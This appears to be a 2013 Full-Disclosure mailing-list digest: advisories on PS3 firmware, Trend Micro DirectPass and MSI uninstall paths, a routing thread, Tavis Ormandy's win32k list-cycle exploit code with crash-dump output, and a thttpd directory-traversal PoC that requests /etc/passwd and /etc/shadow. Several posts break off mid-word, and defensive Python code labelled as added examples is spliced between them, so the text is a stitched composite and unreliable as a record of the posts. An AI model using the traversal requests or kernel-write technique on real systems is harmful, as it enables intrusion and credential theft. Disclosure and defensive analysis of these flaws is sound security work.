[Full-disclosure] Sony PS3 Firmware v4.31 - Code Execution Vulnerability

2013-05-20 Thread Vulnerability Lab
Title:
==
Sony PS3 Firmware v4.31 - Code Execution Vulnerability


Date:
=
2013-05-12


References:
===
http://www.vulnerability-lab.com/get_content.php?id=767


VL-ID:
=
767


Common Vulnerability Scoring System:

6.5


Introduction:
=
The PlayStation 3 is the third home video game console produced by Sony 
Computer Entertainment and the successor to the 
PlayStation 2 as part of the PlayStation series. The PlayStation 3 competes 
with Microsoft's Xbox 360 and Nintendo's Wii 
as part of the seventh generation of video game consoles. It was first released 
on November 11, 2006, in Japan, with 
international markets following shortly thereafter.

Major features of the console include its unified online gaming service, the 
PlayStation Network, its multimedia capabilities, 
connectivity with the PlayStation Portable, and its use of the Blu-ray Disc as 
its primary storage medium.

(Copy of the Homepage: http://en.wikipedia.org/wiki/PlayStation_3 )


PlayStation Network, often abbreviated as PSN, is an online multiplayer gaming 
and digital media delivery service provided/run 
by Sony Computer Entertainment for use with the PlayStation 3, PlayStation 
Portable, and PlayStation Vita video game consoles. 
The PlayStation Network is the video game portion of the Sony Entertainment 
Network.

(Copy of the Homepage: http://en.wikipedia.org/wiki/PlayStation_Network)


Abstract:
=
The Vulnerability Laboratory Research Team discovered a code execution 
vulnerability in the official Playstation3 v4.31 Firmware.


Report-Timeline:

2012-10-26: Researcher Notification & Coordination
2012-11-18: Vendor Notification 1
2012-12-14: Vendor Notification 2
2012-01-18: Vendor Notification 3
2012-**-**: Vendor Response/Feedback
2012-05-01: Vendor Fix/Patch by Check
2012-05-13: Public Disclosure


Status:

Published


Affected Products:
==
Sony
Product: Playstation 3 4.31


Exploitation-Technique:
===
Local


Severity:
=
High


Details:

A local code execution vulnerability is detected in the official Playstation3 
v4.31 Firmware. 
The vulnerability allows local attackers to inject and execute code out of the 
vulnerable PS3 main menu web context. 

There are 3 types of save games for the Sony PS3. The report is only bound to 
the .sfo save games of the Playstation3.
The PS3 save games sometimes use a PARAM.SFO file in the folder (USB or PS3 HD) 
to display movable text like marquees, 
in combination with a video, sound and the (path) background picture. Normally 
the PS3 firmware parses the redisplayed 
save game values & detail information text when processing to load it via 
USB/PS3-HD. The PS3 import preview filtering 
can be bypassed via a split char-by-char injection of script code or system 
(PS3 firmware) specific commands.

The attacker synchronizes his computer (to change the USB context) with the USB 
(Save Game) and connects to the network 
(USB, COMPUTER, PS3), updates the save game via computer and can execute the 
context directly out of the PS3 savegame preview 
listing menu (USB/HD). The exploitation requires local system access, a 
manipulated .sfo file and a USB device. The attacker 
can only use the given byte size of the saved string (attribute values) to 
inject his own commands or script code.

The PS3 filter system of the SpeicherDaten (DienstProgramm) module does not 
recognize special chars and does not provide 
any kind of input restrictions. Attackers can manipulate the .sfo file of a 
save game to execute system specific commands 
or inject malicious persistent script code.

Successful exploitation of the vulnerability can result in persistent but local 
system command executions, PSN session 
hijacking, persistent phishing attacks, external redirect out of the vulnerable 
module, and stable persistent save game preview 
listing context manipulation.


Vulnerable Section(s):
[+] PS Menu > Game (Spiel)

Vulnerable Module(s):
[+] SpeicherDaten (DienstProgramm) PS3 > USB Gerät (USB device)

Affected Section(s):
[+] Title - Save Game Preview Resource (Detail Listing)


Proof of Concept:
=
The firmware preview listing validation vulnerability can be exploited by local 
attackers with low or medium required user interaction.
For demonstration or to reproduce ...

The attacker needs to sync his computer (to change the USB context) with the USB 
(Save Game) and connects to the network
(USB, COMPUTER, +PS3), updates the save game via computer and can execute the 
context directly out of the PS3 savegame preview 
listing menu (USB/HD). The exploitation requires local system access, a 
manipulated .sfo file and a USB device. The attacker 
can only use the given byte size of the saved string (attribute values) to 
inject his own commands or script code.

T
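A defender-side complement to the advisory above, added here as an example and not part of the Vulnerability Lab post: a strict PARAM.SFO parser that checks every offset and length against the buffer, enforces the reserved size of each string attribute (the "given byte size of the saved string" the advisory refers to) and flags control characters in the text fields, so a save-game preview is rejected before anything is rendered. The header and index-entry layout follows the commonly documented PS3 PARAM.SFO structure and is an assumption, as are the key names and the two constructed sample images; the firmware's real parser is not shown on the page.

```python
import struct
import unicodedata
from collections import namedtuple

# Assumed PARAM.SFO layout (the commonly documented PS3 format; the advisory
# does not describe it): 20-byte header, 16-byte index entries, key table, data table.
SFO_MAGIC = b"\x00PSF"
SFO_VERSION = 0x0101
FMT_UTF8_SPECIAL = 0x0004   # UTF-8, not NUL-terminated
FMT_UTF8 = 0x0204           # UTF-8, NUL-terminated
FMT_INT32 = 0x0404          # unsigned 32-bit integer
HEADER = struct.Struct("<4sIIII")  # magic, version, key_table_start, data_table_start, count
ENTRY = struct.Struct("<HHIII")    # key_offset, data_fmt, data_len, data_max_len, data_offset
SfoEntry = namedtuple("SfoEntry", "key fmt data_len data_max_len raw")

def build_sfo(entries):
    """Builds an SFO image from (key, fmt, value_bytes, max_len) tuples; used here
    only to create constructed test input. An over-long value spills past its slot."""
    index, keys, data = b"", b"", b""
    for key, fmt, value, max_len in entries:
        index += ENTRY.pack(len(keys), fmt, len(value), max_len, len(data))
        keys += key.encode("ascii") + b"\x00"
        data += value + b"\x00" * max(0, max_len - len(value))
    key_start = HEADER.size + len(index)
    pad = (-len(keys)) % 4                       # data table is 4-byte aligned
    data_start = key_start + len(keys) + pad
    header = HEADER.pack(SFO_MAGIC, SFO_VERSION, key_start, data_start, len(entries))
    return header + index + keys + b"\x00" * pad + data

def parse_sfo(blob):
    """Parses an SFO image with every offset and length checked against the buffer."""
    if len(blob) < HEADER.size:
        raise ValueError("truncated header")
    magic, _version, key_start, data_start, count = HEADER.unpack_from(blob, 0)
    if magic != SFO_MAGIC:
        raise ValueError("bad magic")
    if HEADER.size + count * ENTRY.size > key_start or key_start > data_start or data_start > len(blob):
        raise ValueError("tables out of bounds")
    entries = []
    for i in range(count):
        key_off, fmt, dlen, dmax, doff = ENTRY.unpack_from(blob, HEADER.size + i * ENTRY.size)
        key_end = blob.find(b"\x00", key_start + key_off, data_start)
        if key_start + key_off >= data_start or key_end < 0:
            raise ValueError("key %d out of bounds" % i)
        key = blob[key_start + key_off:key_end].decode("ascii")
        if data_start + doff + dlen > len(blob):
            raise ValueError("data for %s out of bounds" % key)
        entries.append(SfoEntry(key, fmt, dlen, dmax, blob[data_start + doff:data_start + doff + dlen]))
    return entries

def is_well_formed(blob):
    try:
        parse_sfo(blob)
        return True
    except ValueError:
        return False

def audit_entry(e):
    """Policy violations for one entry; an empty list means the entry is clean."""
    problems = []
    if e.data_len > e.data_max_len:
        problems.append("data_len exceeds data_max_len")
    if e.fmt == FMT_INT32:
        return problems + (["int32 with wrong length"] if e.data_len != 4 else [])
    if e.fmt not in (FMT_UTF8, FMT_UTF8_SPECIAL):
        return problems + ["unknown data_fmt 0x%04x" % e.fmt]
    try:
        text = e.raw.decode("utf-8")
    except UnicodeDecodeError:
        return problems + ["invalid UTF-8"]
    if e.fmt == FMT_UTF8:
        if not text.endswith("\x00"):
            problems.append("missing NUL terminator")
        text = text.rstrip("\x00")
    # Unicode "Other" categories (controls, format chars, unassigned) have no
    # place in text that a menu renders
    bad = sorted({"U+%04X" % ord(c) for c in text if unicodedata.category(c).startswith("C")})
    if bad:
        problems.append("control characters: " + ", ".join(bad))
    return problems

def audit_sfo(blob):
    """Maps key -> violations for every entry in the image."""
    return {e.key: audit_entry(e) for e in parse_sfo(blob)}

# Constructed samples: a clean image, and one whose SUB_TITLE overruns its
# reserved size and whose DETAIL carries a terminal escape sequence.
CLEAN_SFO = build_sfo([
    ("TITLE", FMT_UTF8, b"My Save Game\x00", 128),
    ("PARENTAL_LEVEL", FMT_INT32, struct.pack("<I", 1), 4),
])
TAMPERED_SFO = build_sfo([
    ("TITLE", FMT_UTF8, b"Ok\x00", 128),
    ("SUB_TITLE", FMT_UTF8, b"A" * 70 + b"\x00", 64),
    ("DETAIL", FMT_UTF8, b"line\x1b[2Jwiped\x00", 1024),
])
```

The two checks that matter for the advisory's bug class are structural: a string is never trusted beyond the slot it was reserved, and the text is screened by Unicode category rather than by a list of forbidden substrings, so splitting a payload character by character does not help. `audit_sfo(TAMPERED_SFO)` reports the over-long SUB_TITLE and the escape sequence in DETAIL while the clean image passes.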

[Full-disclosure] Trend Micro DirectPass 1.5.0.1060 (Cloud) Software - Multiple Software Vulnerabilities

2013-05-20 Thread Vulnerability Lab
Title:
==
Trend Micro DirectPass 1.5.0.1060 (Cloud) Software - Multiple Software 
Vulnerabilities


Date:
=
2013-05-21


References:
===
http://www.vulnerability-lab.com/get_content.php?id=894

Article: http://www.vulnerability-lab.com/dev/?p=580

Trend Micro (Reference): 
http://esupport.trendmicro.com/solution/en-US/1096805.aspx
Trend Micro Solution ID: 1096805

Video: http://www.vulnerability-lab.com/get_content.php?id=951


VL-ID:
=
894


Common Vulnerability Scoring System:

6.1


Introduction:
=
Trend Micro™ DirectPass™ manages website passwords and login IDs in one secure 
location, so you only need to 
remember one password. Other features include: Keystroke encryption, secure 
password generation, automatic 
form-filling, confidential notes, and a secure browser.

Convenience - You can securely and easily manage passwords for numerous online 
accounts with just one 
password and automatically login to your websites with one click. More Security 
- You get an extra layer of 
online security with a specially designed browser for online banking and 
financial websites and protection 
from keylogging malware. No Hassles – You don’t have to be a technical wizard to 
benefit from this password 
service, it’s simple to use. Confidence – You can have peace of mind using a 
password service provided by 
an Internet security provider with 20+ years of experience. All Your Devices – 
You can use DirectPass 
password manager on Windows PCs, Android mobile, Android Tablet, iPads and 
iPhones, and all devices are 
automatically encrypted and synchronized using the cloud.

(Copy of the Vendor Homepage: 
http://www.trendmicro.com/us/home/products/directpass/index.html )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple software 
vulnerabilities in the official Trend Micro DirectPass v1.5.0.1060 Software.


Report-Timeline:

2013-03-08: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-03-09: Vendor Notification (Trend Micro - Security Team)
2013-03-16: Vendor Response/Feedback (Trend Micro - Karen M.)
2013-05-09: Vendor Fix/Patch (Trend Micro - Active Update Server)
2013-05-15: Vendor Fix/Patch (Trend Micro - Solution ID & Announcement)
2013-05-21: Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Trend Micro
Product: DirectPass 1.5.0.1060


Exploitation-Technique:
===
Local


Severity:
=
High


Details:

1.1
A local command injection vulnerability is detected in the official Trend Micro 
DirectPass v1.5.0.1060 Software.
The vulnerability allows local low privileged system user accounts to inject 
system specific commands or local 
path requests to compromise the software.

The vulnerability is located in the direct-pass master password setup module of 
the Trend Micro InstallWorkspace.exe file.
The master password module of the software allows users to review the included 
password in the second step for security 
reasons. The hidden protected master password will only be visible in the check 
module when the customer mouses over the 
censored password field. When the software displays the hidden password in plain 
text, the command/path injection will be 
executed out of the unparsed master password context in the field listing.

Exploitation of the vulnerability requires a low privilege system user account 
with direct-pass access and low or medium 
user interaction. Successful exploitation of the vulnerability results in 
software and system process compromise or 
execution of local system specific commands/paths.

Vulnerable File(s):
[+] InstallWorkspace.exe

Vulnerable Module(s):
[+] Setup Master Password

Vulnerable Parameter(s):
[+] Master Password

Affected Module(s):
[+] Check Listing (Master Password)


1.2
A persistent input validation vulnerability is detected in the official Trend 
Micro DirectPass v1.5.0.1060 Software.
The bug allows local attackers with a low privileged system user account to 
implement/inject malicious script code on the 
application side (persistent) of the software.

The persistent web vulnerability is located in the direct-pass check module 
when processing to list a manipulated master password. 
In step one, a malicious iframe is injected in the hidden field as master password. 
The inserted context will be saved and the execution 
will happen in the next step when processing to list the master password context in 
the last check module. To bypass the validation 
and execute the injected script code the attacker needs to split (%20) the 
input request.

Exploitation of the vulnerability requires medium user interaction and a low 
privilege system user account with direct-pa
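As an added example (not Trend Micro's code and not from the advisory), the two rendering paths for a master-password check listing side by side: an input-side substring blacklist that runs before URL decoding and therefore never sees the decoded value, against HTML escaping at output time, which shows the stored value as text no matter what got past input validation. The function names, the blocked-token list and the sample inputs are constructed for the example.

```python
import html
from urllib.parse import unquote

# Tokens a substring blacklist would look for (constructed; the advisory
# mentions only the iframe).
BLOCKED_TOKENS = ("<iframe", "<script", "javascript:")

def blacklist_passes(submitted):
    """Input-side filter, the fragile approach: rejects only when a blocked
    token appears literally in the value as submitted."""
    lowered = submitted.lower()
    return not any(token in lowered for token in BLOCKED_TOKENS)

def store_master_password(submitted):
    """Models a setup step that validates first and URL-decodes afterwards
    (check-then-decode). Returns the value that would be persisted."""
    if not blacklist_passes(submitted):
        raise ValueError("rejected by input filter")
    return unquote(submitted)

def render_check_row_unsafe(stored):
    """The check listing as the advisory describes it: the stored value is
    placed into the markup verbatim when the field is revealed."""
    return '<span class="pw">%s</span>' % stored

def render_check_row(stored):
    """Hardened rendering: the stored value is HTML-escaped at output time,
    so whatever survived the input stage is displayed as text, not markup."""
    return '<span class="pw">%s</span>' % html.escape(stored, quote=True)

PREFIX, SUFFIX = '<span class="pw">', "</span>"

def value_region(rendered):
    return rendered[len(PREFIX):-len(SUFFIX)]

def value_region_is_inert(rendered):
    """True when the text between the span tags contains no raw markup characters."""
    return not any(ch in value_region(rendered) for ch in "<>\"'")

# Constructed inputs: a literal tag, the same tag percent-encoded so the input
# filter sees no blocked token, and a legitimate password containing markup chars.
LITERAL = "<iframe src=x>"
ENCODED = "%3Ciframe%20src%3Dx%3E"
LEGIT = 'p@ss<w0rd>&"quoted"'

def demo():
    """Runs the encoded input through both paths and reports what each yields."""
    stored = store_master_password(ENCODED)      # passes the filter, decodes to a tag
    return {
        "decoded": stored,
        "unsafe_inert": value_region_is_inert(render_check_row_unsafe(stored)),
        "hardened_inert": value_region_is_inert(render_check_row(stored)),
        # escaping must not damage a genuine password: unescaping gives it back
        "legit_preserved": html.unescape(value_region(render_check_row(LEGIT))) == LEGIT,
    }
```

The lesson is about layering: a filter that runs on a different representation than the one finally rendered can be walked around by any transformation the application applies later (decoding, splitting, re-joining), whereas escaping at the point of output works on the exact string that reaches the browser. The escaped form is also lossless, so a password that legitimately contains `<`, `&` or quotes still displays correctly.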

Re: [Full-disclosure] exploitation ideas under memory pressure

2013-05-20 Thread Tavis Ormandy
On Fri, May 17, 2013 at 05:44:58PM -0700, Tavis Ormandy wrote:
> On Fri, May 17, 2013 at 02:26:10PM -0700, Tavis Ormandy wrote:
> > 
> > The question is how to get PATHALLOC() to succeed under memory pressure so 
> > we
> > can make this exploitable, my first thought was have another thread
> > manipulating the free pool, but I can't figure out how to synchronize
> > that. Getting code execution should be trivial after this.
> > 
> > I guess it's possible to just race it until we win, but this seems like an
> > inelegant solution. Anyone have any ideas?
> > 
> 
> Ahh, I just realised a really cute trick, we can make PATHREC->next
> point to the same userspace PATHREC, and EPATHOBJ::bFlatten will spin
> forever traversing an infinite linked list.
> 
> i.e.
> 
> PathRecord->next = PathRecord;
> 
> While it's spinning, another thread can clean up the pool, then patch
> the listnode (because it's in userspace), to break into pprFlattenRec!
> Turning this into a clean write-what-where should be trivial.
> 
> Anyone want to volunteer to write it up over the weekend? :)
> 
> Tavis.

I guess I'm talking to myself, maybe this list is all about XSS now ;)

I'm quite proud of this list cycle trick, here's how to turn it into an
arbitrary write.

First, we create a watchdog thread that will patch the list atomically
when we're ready. This is needed because we can't exploit the bug while
HeavyAllocPool is failing, because of the early exit in pprFlattenRec:

.text:BFA122B8 call newpathrec  ; EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong)
.text:BFA122BD cmp eax, 1       ; Check for failure
.text:BFA122C0 jz  short continue
.text:BFA122C2 xor eax, eax     ; Exit early
.text:BFA122C4 jmp early_exit

So we create a list node like this:

PathRecord->Next  = PathRecord;
PathRecord->Flags = 0;

Then EPATHOBJ::bFlatten() spins forever doing nothing:

BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this)
{
    /* ... */

    for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext )
    {
        if ( ppr->flags & PD_BEZIER )
        {
            ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr);
        }
    }

    /* ... */
}

While it's spinning, we clean up in another thread, then patch the thread (we
can do this, because it's now in userspace) to trigger the exploit. The first
block of pprFlattenRec does something like this:

if ( pprNew->pprPrev )
    pprNew->pprPrev->pprnext = pprNew;

Let's make that write to 0x.

DWORD WINAPI WatchdogThread(LPVOID Parameter)
{
    // This routine waits for a mutex object to timeout, then patches the
    // compromised linked list to point to an exploit. We need to do this.
    LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex@%p",
               GetCurrentThreadId(),
               Mutex);

    if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
        // It looks like the main thread is stuck in a call to FlattenPath(),
        // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
        // up, and then patch the list to trigger our exploit.
        while (NumRegion--)
            DeleteObject(Regions[NumRegion]);

        LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &PathRecord->next,
                   &ExploitRecord);

        InterlockedExchangePointer(&PathRecord->next, &ExploitRecord);
    } else {
        LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
    }

    return 0;
}

PathRecord->next  = PathRecord;
PathRecord->prev  = (PVOID)(0x42424242);
PathRecord->flags = 0;

ExploitRecord.next  = NULL;
ExploitRecord.prev  = 0x;
ExploitRecord.flags = PD_BEZIERS;

Here's the output on Windows 8:

kd> g
***
* *
*Bugcheck Analysis*
* *
***

Use !analyze -v to get detailed debugging information.

BugCheck 50, {, 1, 8f18972e, 2}

*** WARNING: Unable to verify checksum for ComplexPath.exe
*** ERROR: Module load completed but symbols could not be loaded for 
ComplexPath.exe
Probably caused by : win32k.sys ( win32k!EPATHOBJ::pprFlattenRec+82 )

Followup: MachineOwner
-

nt!RtlpBreakWithStatusInstruction:
810f46f4 cc  int 3
kd> kv
ChildEBP RetAddr  Args to Child  
a03ab494 8111c87d 0003 c17b60e1  nt!RtlpBreakWithStatusInstruction 
(FPO: [1,0,0])
a03ab4e4 8111c119 0003 817d5340 a03ab8e4 nt!KiBugCheckDebugBreak+0x1c (FPO: 
[Non-Fpo])
a03ab8b8 810f30ba 0050  0001 nt!KeBugCheck2+0x655 (FPO: 
[6,239,4])
a03ab8dc 810f2ff1 0050 c
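As an added example (neither Tavis's code nor win32k's), a model of the record walk in bFlatten with the guards that make the list-cycle trick above fail closed rather than spin: a revisit check for the self-referencing record, a node budget for a list that keeps growing under the walker, and a hard stop when allocation fails instead of carrying on with the walk. `PathRecord`, `GrowingRecord`, the `PD_BEZIER` bit value and the `alloc` callback are assumptions made for the model.

```python
from dataclasses import dataclass
from typing import Optional

PD_BEZIER = 0x10   # assumed bit value; only its use as a flag bit matters here

@dataclass(eq=False)
class PathRecord:
    """Model of one PATHRECORD: a flags word and a next pointer."""
    flags: int = 0
    next: Optional["PathRecord"] = None

class GrowingRecord:
    """Models a list that another thread keeps extending under the walker:
    every read of .next yields a fresh record, so the walk never ends."""
    flags = 0

    @property
    def next(self):
        return GrowingRecord()

class PathError(Exception):
    pass

def flatten_path(first, alloc, max_records=65536):
    """Walks the record list the way the post describes bFlatten doing it, but with
    the guards a walker over attacker-reachable memory needs: a revisit check (the
    self-referencing record), a node budget (a list that keeps growing), and a hard
    stop on allocation failure instead of continuing. Returns (visited, flattened)."""
    seen = {}            # id -> record; keeps records alive so ids stay unique
    visited = flattened = 0
    node = first
    while node is not None:
        if id(node) in seen:
            raise PathError("cycle in path record list")
        seen[id(node)] = node
        visited += 1
        if visited > max_records:
            raise PathError("path record list too long")
        if node.flags & PD_BEZIER:
            if alloc() is None:
                raise PathError("allocation failed; aborting flatten")
            flattened += 1
        node = node.next
    return visited, flattened

def run_flatten(first, alloc, max_records=65536):
    """('ok', (visited, flattened)) or ('error', reason) for a list and allocator."""
    try:
        return ("ok", flatten_path(first, alloc, max_records))
    except PathError as err:
        return ("error", str(err))

def make_list(flag_words):
    """Builds a linear list from flag words (constructed input)."""
    head = None
    for flags in reversed(flag_words):
        head = PathRecord(flags, head)
    return head

def make_self_loop():
    """The record from the post: flags 0 and next pointing back at itself."""
    rec = PathRecord(0)
    rec.next = rec
    return rec

def alloc_ok():
    return object()          # allocation succeeds

def alloc_fail():
    return None              # allocation fails (memory pressure)
```

The budget matters as much as the revisit check: a set of seen nodes catches the one-record cycle from the post, but a list that another thread extends while it is being walked never repeats a node, and only a bound on the number of records ends that walk. The allocation failure is turned into an error that unwinds the whole operation, which is the opposite of the early exit in pprFlattenRec that leaves the partially patched list behind.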

Re: [Full-disclosure] My ISP is routing traffic to private addresses...

2013-05-20 Thread Patrick Webster
Maybe when we cut over to IPv6 the ISPs will revert to the golden age of
putting all their gear on publicly addressable space :)

Conversely, an enjoyable network design is where you route public IPs from
a private network to a private network, and the public IP has different
services on the internet to the internally routed version, but clients need
access to both.

NATing heaven.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Critical issues affecting multiple game engines

2013-05-20 Thread ReVuln

We have just released a paper [1], in which we detail several 0-day
issues affecting a number of different game engines, including: Unreal
Engine, CryEngine 3 and idTech 4.

During our presentation at the recent NoSuchCon conference in Paris, we
discussed [2] additional details about game engine issues. Additionally
we demonstrated [3] how an attacker can use master servers to perform
mass-exploiting of game vulnerabilities, in order to target and potentially
take down entire game networks.


[1] http://revuln.com/files/ReVuln_Game_Engines_0days_tale.pdf
[2] http://revuln.com/files/Ferrante_Auriemma_Exploiting_Game_Engines.pdf
[3] http://vimeo.com/66027238


---
ReVuln
http://revuln.com
http://twitter.com/revuln
http://revuln.com/revuln.asc





Re: [Full-disclosure] My ISP is routing traffic to private addresses...

2013-05-20 Thread Alexander Georgiev

   Because private addresses have no global meaning, routing information
   about private networks shall not be propagated on inter-enterprise
   links, and packets with private source or destination addresses
   should not be forwarded across such links. Routers in networks not
   using private address space, especially those of Internet service
   providers, are expected to be configured to reject (filter out)
   routing information about private networks. If such a router receives
   such information the rejection shall not be treated as a routing
   protocol error.



On 18 May 2013 14:55:08, Justin Elze wrote:

The idea behind private IP space is it doesn't leave the ISP's AS via BGP to
the rest of the internet.

On the topic of routing, if your router doesn't have a directly connected
route or specific route for 172.x.x.x/whatever it will automatically send
information to the default 0.0.0.0 route.

There could be a number of cases where you had private IP space in front of
a router/wap/whatever.

ISPs use prefix lists on their border BGP routers to explicitly allow
which ranges get redistributed to the rest of the internet.


On Sat, May 18, 2013 at 7:41 AM, Kirils Solovjovs <kirils.solovj...@kirils.com> wrote:

>
>
> On 2013.05.18. 10:34, Alexander Georgiev wrote:
>
>> It is sad, that many people don't understand network basics. BTW, your
>> internet router should not forward rfc1918 addresses to the outside,
>> shouldn't he?
>>
> It should. Private address ranges are not marked "magic cows" inside a
> classical router's firmware.
>
> Still the problem OP is experiencing is strange, since if there is a local
> subnet, it should have a priority local route. Why isn't it there?
>
> Btw, I'd be cautious to state that ISPs filter incoming packets with
> dst=private. The limitation here would be that private ranges will usually
> be routed upstream, so you can't really get past an internet exchange.
>
> --
> Kirils Solovjovs
>
>




[Full-disclosure] Defense in depth -- the Microsoft way

2013-05-20 Thread Stefan Kanthak
Hi @ll,

the "Microsoft Installer" creates for applications installed via an
.MSI the following uninstall information in the Windows registry
(see ):

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall]
"UninstallString"="MsiExec.Exe /X{}"
"ModifyPath"="MsiExec.Exe /I{}"

Note the unqualified path to the executable "msiexec.exe".

On Windows installations without the "SafeProcessSearchMode" hotfix
(cf. ) or with this safeguard
turned off (cf. ,
which refers to  alias MS09-015),
an executable "msiexec.exe" placed in the CWD or the user's "base"
directory (addressed by "%HOMEDRIVE%%HOMEPATH%" and typically equal to
"%USERPROFILE%") can be run instead of the intended executable
"%SystemRoot%\System32\MsiExec.Exe".


The VERY simple fix (which eliminates this attack vector completely):
always use fully-qualified paths to the well-known executables.

JFTR: cf. 

Stefan Kanthak
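To find the entries Stefan describes on a given machine, an added example that is not part of his post: it reads lines in .reg export format, extracts the program token of each UninstallString and ModifyPath, and reports those that are not rooted at a drive letter, a UNC share or an environment variable such as %SystemRoot%. The registry lines are constructed with obvious placeholder GUIDs, and the accepted prefix forms are an assumption (the %VAR% form relies on the value being REG_EXPAND_SZ so the variable is expanded before the command runs).

```python
import re

# Value names the post shows the Windows Installer writing with an
# unqualified "MsiExec.Exe" (registry value names are case-insensitive).
CHECKED_VALUES = {"uninstallstring", "modifypath"}
REG_KEY = re.compile(r"^\[(?P<key>[^\]]+)\]$")
REG_STRING = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')
# Drive-rooted, UNC, or environment-variable-rooted (%SystemRoot%\...); the
# last form assumes a REG_EXPAND_SZ value so the variable is expanded first.
QUALIFIED = re.compile(r"^(?:[A-Za-z]:\\|\\\\[^\\]+\\[^\\]+|%[^%\\]+%\\)")

def unescape_reg(data):
    r"""Undoes .reg export escaping: \\ becomes \ and \" becomes "."""
    return re.sub(r"\\(.)", r"\1", data)

def executable_of(command):
    """Program token of a command line: the quoted first token if present,
    otherwise the first whitespace-delimited word."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(None, 1)[0] if command else ""

def is_fully_qualified(path):
    return QUALIFIED.match(path) is not None

def find_unqualified(reg_text):
    """Returns (key, value name, executable) for every checked value whose
    program token is not a fully qualified path."""
    findings = []
    key = None
    for line in reg_text.splitlines():
        line = line.strip()
        m = REG_KEY.match(line)
        if m:
            key = m.group("key")
            continue
        m = REG_STRING.match(line)
        if not m or m.group("name").lower() not in CHECKED_VALUES:
            continue
        exe = executable_of(unescape_reg(m.group("data")))
        if not is_fully_qualified(exe):
            findings.append((key, m.group("name"), exe))
    return findings

# Constructed .reg excerpt with placeholder GUIDs: an MSI entry of the kind the
# post shows, a quoted drive-rooted uninstaller, and the post's suggested fix.
SAMPLE_REG = "\n".join([
    r"[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{EXAMPLE-GUID-1}]",
    r'"DisplayName"="Example App (MSI)"',
    r'"UninstallString"="MsiExec.Exe /X{EXAMPLE-GUID-1}"',
    r'"ModifyPath"="MsiExec.Exe /I{EXAMPLE-GUID-1}"',
    "",
    r"[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{EXAMPLE-GUID-2}]",
    r'"UninstallString"="\"C:\\Program Files\\Example\\unins000.exe\" /SILENT"',
    "",
    r"[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{EXAMPLE-GUID-3}]",
    r'"UninstallString"="%SystemRoot%\\System32\\MsiExec.Exe /X{EXAMPLE-GUID-3}"',
])

if __name__ == "__main__":
    for key, name, exe in find_unqualified(SAMPLE_REG):
        print("%s: %s runs unqualified %r" % (key, name, exe))
```

Feeding it the output of `reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall` (and the Wow6432Node counterpart on 64-bit systems) lists exactly the entries where the fix Stefan proposes, a fully qualified path to msiexec.exe, has not been applied.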



[Full-disclosure] Thttpd 2.25b Directory Traversal Vulnerability

2013-05-20 Thread metropolis haxor
Hi guys,
You can find the software affected at 
http://www.acme.com/software/thttpd/thttpd-2.25b.tar.gz 
Thanks,
Metropolis
###
#
# Software Name : Thttpd 2.25b
#
# Version :  2.25b (29dec2003)
#
# Bug Type : Directory Traversal Vulnerability
#
# Found by : Metropolis
#
# Home : http://metropolis.fr.cr
#
# Discovered : 19/05/2013
#
# Download app : http://www.acme.com/software/thttpd/thttpd-2.25b.tar.gz
#
#
###
 
PoC :
 
127.0.0.1:80/../../../../../../../../etc/passwd


127.0.0.1:80/../../../../../../../../etc/shadow 
 

Example :
 
metropolis@Linuxbox ~ $ GET 127.0.0.1:80/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/dev/null
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/bin/false
gdm:x:42:42::/var/gdm:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
squid:x:23:23::/var/spool/squid:/dev/null
named:x:70:70:Named:/var/named:/bin/false
pcap:x:77:77::/var/arpwatch:/bin/nologin
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
junkbust:x:73:73::/etc/junkbuster:/bin/bash
